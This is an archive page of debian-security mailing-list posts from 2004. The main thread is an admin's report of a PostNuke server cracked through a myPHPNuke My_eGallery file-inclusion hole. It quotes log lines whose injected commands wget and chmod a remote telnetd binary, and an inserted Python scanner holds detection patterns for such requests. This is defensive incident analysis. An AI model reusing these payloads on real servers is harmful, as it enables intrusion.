Re: Release.gpg files gone?

2004-01-19 Thread Matt Zimmerman
On Mon, Jan 19, 2004 at 12:03:51PM +0200, Camillo Särs wrote:

> Matt Zimmerman wrote:
> >This may have been the case with apt-secure, but this functionality is now
> >merged into apt 0.6 (currently in experimental) in a different way which
> >does not prevent downloads of unauthenticated packages altogether.  
> >Instead,
> >it requires confirmation.
> 
> Matt, I'm sure I'm not the only woody-user who has used the unofficial 
> apt-secure version.  I am trying to build the experimental (0.6.18) version 
> of the new apt on Woody as I write this, but there were more unsatisfied 
> dependencies than I am really comfortable with.
> 
> Have you attempted to build on Woody, and if so, what was the outcome?  Is 
> there any chance of getting a quick step-by-step build guide? Or is there 
> simply too much code that depends on newer library versions for this to be 
> feasible?

Can you be more specific?  There are only two build-dependencies which could
be problematic:

One is the versioned dependency on docbook-utils, but that is only needed
for building the arch: all packages.  Do a -B (arch-dep only) build.

The other is the versioned dependency on debhelper, which was added because
of #204731.  That caused the man page installation to fail.  There is a
simple patch in the BTS which could probably be applied to the stable
version.

-- 
 - mdz



Re: (php?) bug exploit report

2004-01-19 Thread J.H.M. Dassen (Ray)
On Mon, Jan 19, 2004 at 14:40:12 +0100, Csan wrote:
> One of my servers has been cracked into and I am looking for the weak
> spots of the system and also looking for ways to lock the secholes I might
> (also) have. The linux box is an up-to-date woody (incl. security
> updates).
> 
> My first question is how come such a thing worked on my box?

Apparently you installed PHP code that had a security vulnerability.

> "GET
> //modules/My_eGallery/public/displayCategory.php?basepath=http://geocities.yahoo.com.br/dcha0s/cse.gif?&cmd=id;uname%20-a;pwd;cd%20/;cd%20tmp;wget%20www.fdlsk8.hpg.ig.com.br/telnetd;
> HTTP/1.1" 200 7047

This appears to be exploiting the vulnerability described in
http://www.secunia.com/advisories/9721/
("myPHPNuke Arbitrary File Inclusion Vulnerability", 2003-09-12).

> (Debian unstable has version 0.732-4.2, so the first thing to do is to
> backport the unstable version. Or is it rather a php bug?:

No, it's a myPHPNuke bug; it doesn't do enough input validation (see
http://www.tldp.org/HOWTO/Secure-Programs-HOWTO/input.html).

HTH,
Ray
-- 
[...] computer source code, though unintelligible to many, is the preferred
method of communication among computer programmers. 
http://pacer.ca6.uscourts.gov/cgi-bin/getopn.pl?OPINION=00a0117p.06
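A defender-side check for the pattern Ray identifies, as an added example that is not code from the thread or from PostNuke/myPHPNuke: it parses Apache access-log entries shaped like the ones Csan quoted, URL-decodes each query parameter, and flags values that are themselves a remote URL (the basepath= pattern) or carry shell command separators (the cmd= pattern). The first sample entry is the one from the thread; the two benign entries and their hosts are constructed.

```python
import re
from urllib.parse import unquote_plus

# Common-log-format request line; the timestamp is optional because the
# entries quoted in the thread had it stripped.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ (?:\[[^\]]*\] )?'
    r'"(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3}) \S+')
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)  # basepath=http://...
SHELL_META = re.compile(r'[;|`]|\$\(')                          # cmd=id;uname -a

def parse_query(query):
    """Split on '&' only and URL-decode; done by hand so a ';' inside a
    value stays data (older parse_qsl versions split on ';' as well)."""
    params = []
    for part in query.split('&'):
        if part:
            key, _, value = part.partition('=')
            params.append((unquote_plus(key), unquote_plus(value)))
    return params

def analyze_line(line):
    """Return a finding dict for a suspicious request line, else None."""
    m = LOG_RE.match(line)
    if m is None:
        return None  # not a request line in the expected shape
    path, _, query = m.group('uri').partition('?')
    findings = []
    for key, value in parse_query(query):
        if REMOTE_URL.match(value):        # parameter carries a remote URL
            findings.append((key, 'remote_url'))
        if SHELL_META.search(value):       # parameter carries a shell command
            findings.append((key, 'shell_metachar'))
    if not findings:
        return None
    return {'client': m.group('client'), 'path': path,
            'status': int(m.group('status')), 'findings': findings}

def scan_log(text):
    """Run analyze_line over every line of an access log and keep the hits."""
    return [hit for hit in map(analyze_line, text.splitlines()) if hit]

# Constructed sample: the first entry is the one quoted in the thread, joined
# onto one line; the other two are made-up benign requests for contrast.
SAMPLE_LOG = (
    '200.249.4.237 - - "GET //modules/My_eGallery/public/displayCategory.php'
    '?basepath=http://geocities.yahoo.com.br/dcha0s/cse.gif?&cmd=id;uname%20-a;pwd'
    ' HTTP/1.1" 200 7047\n'
    '10.0.0.5 - - "GET /modules/My_eGallery/public/displayCategory.php'
    '?basepath=modules/My_eGallery&cid=3 HTTP/1.1" 200 5120\n'
    '10.0.0.6 - - "GET /index.php?page=about HTTP/1.1" 200 2048\n'
)

if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print(hit['client'], hit['path'], hit['findings'])
```

Run it over the real access log with `scan_log(open(path).read())`; a hit only says the request looked like an inclusion attempt, the 200 status does not by itself prove the include succeeded.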



(php?) bug exploit report

2004-01-19 Thread Csan
Hello debian-security,

One of my servers has been cracked into and I am looking for the weak spots of
the system and also looking for ways to lock the secholes I might (also) have.
The linux box is an up-to-date woody (incl. security updates).

My first question is how come such a thing worked on my box? (I do not know php
myself at all):

"GET
//modules/My_eGallery/public/displayCategory.php?basepath=http://geocities.yahoo.com.br/dcha0s/cse.gif?&cmd=id;uname%20-a;pwd;cd%20/;cd%20tmp;wget%20www.fdlsk8.hpg.ig.com.br/telnetd;
HTTP/1.1" 200 7047
[*] see bottom of this email for further occurrences

The URL is part of a postnuke site and they could start up the telnetd binary
by invoking a URL similar to the one above!
Is this a known sechole?

I am providing some further details about these cracks for others to be aware of
similar threats...:

PostNuke: The Phoenix Release (0.7.2.6)
(Debian unstable has version 0.732-4.2, so the first thing to do is to backport
the unstable version. Or is it rather a php bug?:

ii  libphp-adodb    1.51-1.1        The 'adodb' database abstraction layer for p
ii  libphp-phplot   4.4.6-2         The graphic library for php.
ii  php3-cgi        3.0.18-23.1woo  A server-side, HTML-embedded scripting langu
ii  php3-cgi-mysql  3.0.18-23.1woo  Mysql module for PHP3 (cgi)
ii  php3-doc        3.0.18-23.1woo  Documentation for PHP3
ii  php4            4.1.2-6woody3   A server-side, HTML-embedded scripting langu
ii  php4-cgi        4.1.2-6woody3   A server-side, HTML-embedded scripting langu
ii  php4-gd         4.1.2-6woody3   GD module for php4
ii  php4-imap       4.1.2-6woody3   IMAP module for php4
ii  php4-ldap       4.1.2-6woody3   LDAP module for php4
ii  php4-mysql      4.1.2-6woody3   MySQL module for php4
ii  php4-pear       4.2.1-3         PEAR - PHP Extension and Application Reposit
ii  php4-pear-log   1.1-1           Log module for PEAR
ii  php4-pgsql      4.1.2-4         PostgreSQL module for php4
ii  phplib          7.2d-3.1        Library for easy writing web applications (s
ii  phpmyadmin      2.5.2-1woody2.  A set of PHP-scripts to administrate MySQL o
ii  phpnuke         6.0-10          A web portal and community system, mostly li
ii  phppgadmin      2.4.1-2         A set of PHP-scripts to administrate Postgre
ii  phpsysinfo      2.0-3woody1     PHP Based Host Information

)

$modversion['name'] = 'My_eGallery';  // Module Name
$modversion['version'] = '3.1.1';  // Version Number

The telnetd and other ELF executables they used and that were found in /tmp are
the following:

-rwxr-xr-x  1 www-data www-data     2897 ptrace
-rwxrwxrwx  1 www-data www-data    19242 r0nin.txt
-rw-r--r--  1 www-data www-data    19242 r0nin.txt.1
-rw-r--r--  1 www-data www-data    19242 r0nin.txt.2
-rw-r--r--  1 www-data www-data  1325904 r.txt
-rwxr-xr-x  1 www-data www-data    17643 suco.txt
-rwxrwxrwx  1 www-data www-data   170613 telnetd
-rw-r--r--  1 www-data www-data   170613 telnetd.1
-rw-r--r--  1 www-data www-data   170613 telnetd.2
-rw-r--r--  1 www-data www-data   170613 telnetd.3
-rwxr-xr-x  1 www-data www-data    17836 x
-rwxr-xr-x  1 www-data www-data     5013 x0x
-rwsrwsrwt  1 www-data www-data     7180 xiit
-rw-r--r--  1 www-data www-data     7180 xiit.1
-rw-r--r--  1 www-data www-data     7180 xiit.2

The following was found in the directory of displayCategory.php:

-rwxr-xr-x  1 www-data www-data     6453 bd.cgi

Some other interesting details:

www-data 11584  0.0  0.1  2536 1288 ?  S  18:57   0:00 wget http://www.cyberlordsteam.hpg.ig.com.br/exploits/r.txt

a wget-log file was open in /tmp, containing:

--18:57:51--  http://www.cyberlordsteam.hpg.ig.com.br/exploits/r.txt
   => `r.txt'
Resolving www.cyberlordsteam.hpg.ig.com.br... done.
Connecting to www.cyberlordsteam.hpg.ig.com.br[200.226.137.10]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4,590,900 [text/plain]

 3% [>] 174,224  796.04B/s  ETA 1:32:28

I also still have the binaries they used. Is anyone interested in taking a
look at them?

Thank you.
Regs,

Csan

PS 1: Please Cc: me as I am not subscribed to the list. And I wouldn't like to,
if possible.
PS 2: further apache log crack entries:

200.249.4.237 - - "GET
//modules/My_eGallery/public/displayCategory.php?basepath=http://geocities.yahoo.com.br/dcha0s/cse.gif?&cmd=id;uname%20-a;pwd
HTTP/1.1" 200 7047
200.249.4.237 - - "GET
//modules/My_eGallery/public/displayCategory.php?basepath=http://geocities.yahoo.com.br/dcha0s/cse.gif?&cmd=id;uname%20-a;pwd;cd%20/;cd%20tmp;wget%20www.fdlsk8.hpg.ig.com.br/telnetd;chmod%20777%20telnetd;
HTTP/1.1" 200 7047
200.234.12.110 - - "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http://www.jesusaleluia.iwebland.com/dcphp3.gif?&cmd=id;uname%20-a;pwd
HTTP/1.1" 200 3856
adsl-67-36-72-129.dsl.sfldmi.ameritech.net - - "GET
/index/My_eGallery/public/displayCategory.php?basepath=http://www.jesusaleluia.iwebland.com/dcphp3.gif?&cmd=id;uname%20

Re: Release.gpg files gone?

2004-01-19 Thread Camillo Särs

Matt Zimmerman wrote:

> This may have been the case with apt-secure, but this functionality is now
> merged into apt 0.6 (currently in experimental) in a different way which
> does not prevent downloads of unauthenticated packages altogether.  Instead,
> it requires confirmation.

Matt, I'm sure I'm not the only woody-user who has used the unofficial 
apt-secure version.  I am trying to build the experimental (0.6.18) version of 
the new apt on Woody as I write this, but there were more unsatisfied 
dependencies than I am really comfortable with.

Have you attempted to build on Woody, and if so, what was the outcome?  Is 
there any chance of getting a quick step-by-step build guide? Or is there 
simply too much code that depends on newer library versions for this to be 
feasible?

Running dpkg-buildpackage with the "-d" option does not really make me 
confident that I can replace the current apt with the new one... :)

Cheers,
Camillo
--
Camillo Särs <[EMAIL PROTECTED]>  **  Aim for the impossible and you
 **   will achieve the improbable.
PGP public key available **



Re: aide, apt-get and remote management...

2004-01-19 Thread Lupe Christoph
On Sunday, 2004-01-18 at 13:22:27 -0800, Johannes Graumann wrote:
> Hello,

> Where are the options below from?
> I run aide 0.10, which is according to the sourceforge site the current
> one and it doesn't like it. Also as someone else mentioned:
> http://www.cs.tut.fi/~rammer/aide.html says "Future plans: ...
> Encrypted and signed database".

They are in the Debian source package. I haven't gotten around to
investigating how they work, though.

Lupe Christoph
-- 
| [EMAIL PROTECTED]   |   http://www.lupe-christoph.de/ |
| "Violence is the resort of the violent" Lu Tze |
| "Thief of Time", Terry Pratchett   |


